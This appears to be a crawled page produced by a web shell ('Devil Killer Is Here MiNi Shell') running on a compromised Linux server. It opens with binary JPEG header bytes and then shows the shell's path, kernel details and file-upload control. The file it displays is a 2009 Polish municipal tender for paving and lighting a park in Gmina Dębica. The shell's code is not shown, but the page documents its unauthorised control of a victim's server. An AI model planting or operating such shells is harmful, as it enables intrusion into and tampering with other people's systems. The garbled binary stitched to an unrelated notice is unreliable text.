JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090415/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090415/104090-N-2009.html

<p class="kh_header"><b>Dębica: ZAGOSPODAROWANIE  TERENU  PRZESTRZENI  PUBLICZNEJ  W  PUSTKOWIE- OSIEDLU - w ramach zadania- Zagospodarowanie terenu przestrzeni publicznej Gminy Dębica.</b><br>
<b>Numer ogłoszenia: 104090 - 2009; data zamieszczenia: 15.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy w Dębicy , ul. Batorego 13, 39-200 Dębica, woj. podkarpackie, tel. 014 6803324, 6803310, faks 014 6803336.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugdebica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAGOSPODAROWANIE  TERENU  PRZESTRZENI  PUBLICZNEJ  W  PUSTKOWIE- OSIEDLU - w ramach zadania- Zagospodarowanie terenu przestrzeni publicznej Gminy Dębica..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAGOSPODAROWANIE  TERENU  PRZESTRZENI  PUBLICZNEJ  W  PUSTKOWIE- OSIEDLU - w ramach zadania- Zagospodarowanie terenu przestrzeni publicznej Gminy Dębica.

Przedmiotem zamówienia jest wykonanie następujących robót budowlanych:

1.	Ścieżki spacerowe oraz dojścia do figur (wykonanie obrzeży betonowych, podbudowy z kruszywa naturalnego, nawierzchni z płyt betonowych i kostki brukowej oraz dostawa i montaż ławek parkowych w ilości 18 szt.);
2.	Pochylnie dla niepełnosprawnych i dojścia (roboty ziemne, wykonanie obrzeży betonowych, podbudowy z kruszywa naturalnego, nawierzchni z płyt betonowych oraz poręczy przy pochylniach);
3.	Oświetlenie parku (montaż słupów oświetleniowych parkowych z fundamentami w ilości 10 szt., montaż skrzynki oświetlenia ulicznego, wykonanie zasilania).

)  Opis  przedmiotu  zamówienia  stanowi : 

-  dokumentacja   projektowa- wykonana przez firmę: SOWA Projektowanie, przygotowanie i prowadzenie
    inwestycji budowlanych - mgr inż. Gabriel Sowa , z siedzibą: 39-200 Dębica, ul. Gawrysia 6. 
-  specyfikacja  techniczna  wykonania  i  odbioru  robót- wykonana przez firmę: SOWA Projektowanie,
   przygotowanie i prowadzenie inwestycji budowlanych - mgr inż. Gabriel Sowa , z siedzibą: 39-200 Dębica,
   ul. Gawrysia 6. 
-  przedmiary  robót - wykonane przez firmę: SOWA Projektowanie, przygotowanie i prowadzenie
    inwestycji budowlanych - mgr inż. Gabriel Sowa , z siedzibą: 39-200 Dębica, ul. Gawrysia 6..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.62-3, 45.11.22.10-0, 45.11.25.00-0, 45.23.14.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> WYMAGANIA DOTYCZĄCE  WADIUM
1.	Zamawiający wymaga  wniesienia wadium w wysokości  8 000,00 zł (słownie: osiem tysięcy złotych 00/100 ). 
2.	Wadium należy wnieść w formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
            Wadium wnoszone w pieniądzu należy wnieść przelewem  na konto Zamawiającego: 
             63 12 40 4764 1111 0000 4861 2049  w banku PEKAO SA Oddział w Dębicy.
          W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się  datę i godzinę
          uznania  kwoty na   rachunku Zamawiającego.

4.       W przypadku Wykonawców  ubiegających się wspólnie o udzielenie zamówienia (art.23 ustawy Pzp) i  
    wniesienia wadium w formie opisanej w art.45 ust.6 pkt 3 i 4 tj. gwarancjach bankowych i
    ubezpieczeniowych- Zamawiający żąda aby w treści gwarancji byli wskazani wszyscy Wykonawcy
    ubiegający się wspólnie o udzielenie zamówienia( np. w konsorcjum - wszyscy uczestnicy
    konsorcjum, w spółce cywilnej - wszyscy wspólnicy spółki cywilnej).
 
5.      W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego
         wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego  w
         Sekretariacie pok. 17  lub zamieścić w osobnej kopercie - opisanej WADIUM dołączonej do oferty.

6.      Nie wniesienie wadium w terminie spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4
         ustawy, a jego oferta zostanie odrzucona na podstawie art. 24 ust. 4 ustawy.

7.      Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli : 
      a)  Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26.ust.3 , nie złożył dokumentów lub
           oświadczeń, o których mowa w art.25 ust.1 lub pełnomocnictw (jeżeli pełnomocnictwo jest wadliwe),
      b)  Wykonawca, którego oferta została wybrana :
           - odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie
           - zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie
             Wykonawcy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 4.  WARUNKI  UDZIAŁU W POSTĘPOWANIU   ORAZ  SPOSÓB  OCENY   ICH     SPEŁNIANIA
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:

1) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

2) Posiadają  niezbędną  wiedzę  i doświadczenie oraz dysponują  potencjałem technicznym i osobami zdolnymi
do wykonania zamówienia  lub  przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału
technicznego i osób zdolnych do wykonania zamówienia.

a)	Wykonawca winien wykazać, że w okresie ostatnich 5 lat przed dniem wszczęcia postępowania (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) -  wykonał  z należytą starannością  minimum 2 roboty budowlane polegające na  wykonaniu obiektów budowlanych  odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia - utwardzenie ciągów komunikacyjnych, dróg ,placów, chodników płytami betonowymi i kostką brukową wraz z  podbudową i obrzeżami   i  wartości  robót  minimum   200 000,00 zł  brutto każda, oraz załączyć dokument potwierdzający, że robota ta została wykonana należycie.

b) Wykonawca winien  wykazać, że w wykonaniu zamówienia będzie uczestniczyć:
- minimum min.1  osoba z uprawnieniami do pełnienia   samodzielnych  funkcji technicznych  w budownictwie w zakresie kierowania robotami budowlanymi w  specjalności  drogowej  ( lub mostowej i specjalizacji techniczno- budowlanej do kierowania robotami budowlanymi w zakresie drogowych obiektów inżynierskich ) wydanymi na podstawie Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie - Dz. U. z 2006 r. Nr 83 poz.578, lub w zakresie kierowania robotami budowlanymi w  specjalności  konstrukcyjno - budowlanej bez ograniczeń (dotyczy uprawnień budowlanych wydanych na podstawie Rozporządzenia Ministra Gospodarki Przestrzennej i Budownictwa z dnia 30 grudnia 1994 r. w sprawie samodzielnych funkcji technicznych w budownictwie - Dz.U. Nr 98 poz 1071 z 2000 r.)  , lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia
- minimum min.1  osoba z uprawnieniami do pełnienia   samodzielnych  funkcji technicznych  w budownictwie w zakresie kierowania robotami budowlanymi w  specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych

c) wykonawca winien  wykazać, że osoby na stanowiskach  samodzielnej funkcji technicznej w budownictwie , które będą uczestniczyć w wykonywaniu zamówienia , posiadają  wymagane uprawnienia budowlane  w  specjalności :
- drogowej  ( lub mostowej i specjalizacji techniczno- budowlanej do kierowania robotami budowlanymi w zakresie drogowych obiektów inżynierskich ) lub konstrukcyjno - budowlanej bez ograniczeń (dotyczy uprawnień budowlanych wydanych na podstawie Rozporządzenia Ministra Gospodarki Przestrzennej i Budownictwa z dnia 30 grudnia 1994 r. w sprawie samodzielnych funkcji technicznych w budownictwie - Dz.U. Nr 98 poz 1071 z 2000 r.)
-instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
-oraz posiadają  ważny wpis na listę członków odpowiedniej Izby Inżynierów Budownictwa i  są ubezpieczone od odpowiedzialności cywilnej, co daje prawo do wykonywania samodzielnych  funkcji technicznych w budownictwie zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. Nr 5, poz. 42 z 2001 r. z późn. zm.).
 
 3) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
 
  4) Niepodlegają  wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełniania warunków podmiotowych udziału w postępowaniu nastąpi na podstawie:
1)	złożonych oświadczeń (w zakresie art. 22 ust. 1 i  art. 24 ust. 1 ustawy Pzp ), 
2)	dokumentów potwierdzających spełnianie tych warunków - 
        - metodą: -spełnia / nie spełnia.

ZAMAWIAJĄCY WYKLUCZY WYKONAWCÓW, KTÓRZY:
- nie spełniają warunków udziału w  postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3 ustawy Prawo zamówień publicznych),
- wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba, że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji (z zastrzeżeniem zamówień udzielanych na podstawie art. 62 ust. 1 pkt 2 lub art. 67 ust. 1 pkt 1 i 2 ustawy),
- złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania, 
- nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3 ustawy,
- podlegają wykluczeniu na podstawie art. 24 ust. 1 pkt 1 - 9
Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą. 

6.  WYMAGANIA PRZEDMIOTOWE ORAZ SPOSÓB OCENY ICH SPEŁNIANIA
1. Wykonanie przedmiotu zamówienia musi być zgodne z opisem przedmiotu zamówienia zawartym w SIWZ  
ust. 2 pkt 1) oraz dokumentacją projektową, specyfikacją techniczną wykonania i odbioru robót oraz przedmiarem robót załączonymi do SIWZ.
2. Zamawiający wymaga  aby Wykonawca  przedłożył (jako załącznik do oferty) kosztorys ofertowy wykonany zgodnie z załączonym  do SIWZ przedmiarem robót . Kosztorys ofertowy będzie pełnił rolę pomocniczą do sprawdzenia zgodności oferowanych robót budowlanych z opisem przedmiotu zamówienia tj. z dokumentacją projektową, STWiOR, przedmiarem robót.
3. Oferta musi zagwarantować:
a)  termin realizacji zamówienia do dnia  31.07.2009 r.
b)płatność za wykonanie przedmiotu umowy  nastąpi po jego wykonaniu i podpisaniu protokołu odbioru.
c) termin płatności wynosi 30 dni od daty wpływu faktury do siedziby Zamawiającego.
d) minimum  3 lata   pełnej gwarancji na wykonane roboty budowlane,
e) wartość brutto przedmiotu zamówienia nie będzie podlegać waloryzacji.
4. Wykonawca  winien  zagwarantować ,że przy wykonaniu zamówienia zastosuje wyroby budowlane wprowadzone do obrotu, które posiadają:
- certyfikat na znak bezpieczeństwa wykazujący, że zapewniono zgodność z kryteriami technicznymi określonymi na podstawie Polskich Norm, aprobat technicznych oraz właściwych przepisów i dokumentów technicznych lub,
- aktualną aprobatę wydaną przez upoważnioną jednostkę aprobującą dany materiał lub ,
- deklaracje zgodności z Polską Normą lub,
- deklaracje zgodności z aprobatą techniczną dla wyrobów nie objętych normami i oddzielnymi aprobatami technicznymi lub,
- zgodę na jednorazowe zastosowanie materiału importowanego na terenie RP wydaną przez upoważniony do tego urząd.
W przypadku materiałów dla których wymagane są w/w dokumenty, każdy dostarczony i użyty do robót materiał, musi posiadać taki dokument, określający w sposób jednoznaczny jego cechy.
Szczegóły zastosowania odpowiednich materiałów budowlanych określa specyfikacja techniczna wykonania i odbioru robót budowlanych stanowiąca załącznik do SIWZ. 

Potwierdzeniem zastosowania odpowiednich materiałów budowlanych jest oświadczenie Wykonawcy złożone w druku Oferta.  

Ocena spełniania  wymagań  przedmiotowych nastąpi na podstawie złożonych oświadczeń i dokumentów potwierdzających spełnianie tych wymagań metodą : spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 5. WYKAZ   DOKUMENTÓW  I  OŚWIADCZEŃ ,  JAKIE  MAJĄ   DOSTARCZYĆ   WYKONAWCY  NA POTWIERDZENIE   SPEŁNIANIA   WARUNKÓW   UDZIAŁU   W   POSTĘPOWANIU
5.1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

5.2. Oświadczenie w zakresie art. 24 ust. 1 ustawy Pzp. - Załącznik nr   1 do SIWZ.

5.3. Oświadczenie w zakresie art. 22 ust. 1 ustawy Pzp.-  Załącznik  nr  2 do SIWZ, w przypadku podkreślenia 
w pkt 2 oświadczenia zdania cyt.:-przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia- Wykonawca winien załączyć do oświadczenia  zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

5.4. Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia- budowa, przebudowa obiektów budowlanych z podaniem ich wartości, przedmiotu oraz daty i miejsca ich wykonania tj. utwardzenie ciągów komunikacyjnych, dróg ,placów, chodników płytami betonowymi i kostką brukową wraz z  podbudową i obrzeżami, oraz załączyć dokumenty potwierdzające, że robota ta została wykonana należycie.
- Załącznik nr 3  do SIWZ
 
5.5. a) Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. - Załącznik nr 4 do SIWZ .
b) Jeżeli w wykazie o którym mowa w pkt.5.5 a) wykonawca wskazał osoby którymi będzie dysponował należy przedłożyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.

5.6. Dokumenty stwierdzające, ze osoby  które będą uczestniczyć w wykonaniu zamówienia i pełnić samodzielną funkcję techniczną w budownictwie  posiadają  wymagane uprawnienia budowlane w specjalności:

-drogowej  ( lub mostowej i specjalizacji techniczno- budowlanej do kierowania robotami budowlanymi w zakresie drogowych obiektów inżynierskich ) lub konstrukcyjno - budowlanej bez ograniczeń (dotyczy uprawnień budowlanych wydanych na podstawie Rozporządzenia Ministra Gospodarki Przestrzennej i Budownictwa z dnia 30 grudnia 1994 r. w sprawie samodzielnych funkcji technicznych w budownictwie - Dz.U. Nr 98 poz 1071 z 2000 r.)

-instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,

- oraz posiadają  wpis na listę członków odpowiedniej Izby Inżynierów Budownictwa i są ubezpieczone od odpowiedzialności cywilnej, co daje prawo do wykonywania samodzielnych  funkcji technicznych w budownictwie zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. Nr 5, poz. 42 z 2001 r. z późn. zm.).

5.7. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej to :
 - zamiast dokumentu o którym mowa  w pkt. 5.1,  - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający , że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 mieś. przed upływem  terminu składania ofert .

5.8  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,
nie wydaje się dokumentów, o których mowa w pkt. 5.7. SIWZ, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
5.9 W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane dokumenty wymienione w punkcie  5.1 , 5.2 , 5.3   muszą  być złożone  przez każdego z  wykonawców.

6.  WYMAGANIA PRZEDMIOTOWE 
1. Wykonanie przedmiotu zamówienia musi być zgodne z opisem przedmiotu zamówienia zawartym w SIWZ  
ust. 2 pkt 1) oraz dokumentacją projektową, specyfikacją techniczną wykonania i odbioru robót oraz przedmiarem robót załączonymi do SIWZ.
2. Zamawiający wymaga  aby Wykonawca  przedłożył (jako załącznik do oferty) kosztorys ofertowy wykonany zgodnie z załączonym  do SIWZ przedmiarem robót . Kosztorys ofertowy będzie pełnił rolę pomocniczą do sprawdzenia zgodności oferowanych robót budowlanych z opisem przedmiotu zamówienia tj. z dokumentacją projektową, STWiOR, przedmiarem robót.
3. Oferta musi zagwarantować:
a)  termin realizacji zamówienia do dnia  31.07.2009 r.
b)płatność za wykonanie przedmiotu umowy  nastąpi po jego wykonaniu i podpisaniu protokołu odbioru.
c) termin płatności wynosi 30 dni od daty wpływu faktury do siedziby Zamawiającego.
d) minimum  3 lata   pełnej gwarancji na wykonane roboty budowlane,
e) wartość brutto przedmiotu zamówienia nie będzie podlegać waloryzacji.
4. Wykonawca  winien  zagwarantować ,że przy wykonaniu zamówienia zastosuje wyroby budowlane wprowadzone do obrotu, które posiadają:
- certyfikat na znak bezpieczeństwa wykazujący, że zapewniono zgodność z kryteriami technicznymi określonymi na podstawie Polskich Norm, aprobat technicznych oraz właściwych przepisów i dokumentów technicznych lub,
- aktualną aprobatę wydaną przez upoważnioną jednostkę aprobującą dany materiał lub ,
- deklaracje zgodności z Polską Normą lub,
- deklaracje zgodności z aprobatą techniczną dla wyrobów nie objętych normami i oddzielnymi aprobatami technicznymi lub,
- zgodę na jednorazowe zastosowanie materiału importowanego na terenie RP wydaną przez upoważniony do tego urząd.
W przypadku materiałów dla których wymagane są w-w dokumenty, każdy dostarczony i użyty do robót materiał, musi posiadać taki dokument, określający w sposób jednoznaczny jego cechy.
Szczegóły zastosowania odpowiednich materiałów budowlanych określa specyfikacja techniczna wykonania i odbioru robót budowlanych stanowiąca załącznik do SIWZ. 

Potwierdzeniem zastosowania odpowiednich materiałów budowlanych jest oświadczenie Wykonawcy złożone w druku Oferta..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ugdebica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dębica, 39-200 Dębica, ul. Batorego 13- pokój 29.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2009 godzina 09:00, miejsce: Urząd Gminy Dębica, 39-200 Dębica, ul. Batorego 13-Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com